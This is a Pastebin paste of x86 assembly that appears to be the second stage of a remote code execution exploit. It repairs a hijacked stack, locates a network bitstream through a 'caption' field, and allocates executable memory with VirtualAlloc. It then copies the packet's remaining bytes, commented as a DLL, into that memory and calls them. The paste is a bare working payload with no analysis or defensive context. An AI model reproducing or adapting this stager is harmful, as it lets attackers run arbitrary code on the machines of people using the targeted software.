Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ;# repair stack
- lea esp, [ebp-0x128]
- ;# get bitstream
- mov eax, [ebp+0x3c] ;# caption
- sub eax, 0x118 ;# bitstream
- mov ecx, [eax] ;# numberOfBitsUsed
- mov edx, [eax+0x8] ;# readOffset
- mov esi, [eax+0xC] ;# data ptr
- add ecx, 7 ;# numberOfBitsUsed bits to bytes
- shr ecx, 3
- add edx, 7 ;# readOffset bits to bytes
- shr edx, 3
- sub ecx, edx ;# numberOfBitsUsed - readOffset = dll size
- add esi, edx ;# data ptr + readOffset = dll ptr
- ;# Check if size is zero
- test ecx, ecx
- jz epilogue
- ;# call VirtualAlloc
- push ecx ;# save ecx
- push 0x40 ;# flProtect = PAGE_EXECUTE_READWRITE
- push 0x3000 ;# flAllocationType = MEM_COMMIT | MEM_RESERVE
- push ecx ;# dwSize = dll size
- push 0 ;# lpAddress = 0
- mov eax, dword ptr [0x008581A4] ;# get VirtualAlloc
- call eax ;# call VirtualAlloc
- mov edi, eax
- pop ecx ;# restore ecx
- ;# Copy dll only if allocation was successful
- test edi, edi
- jz epilogue
- rep movsb
- ;# execute dll
- call edi
- ;# Epilogue
- epilogue:
- pop edi
- pop esi
- mov eax, 1 ;# Set return value to indicate success or failure
- pop ebx
- mov esp, ebp
- pop ebp
- ret 8
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
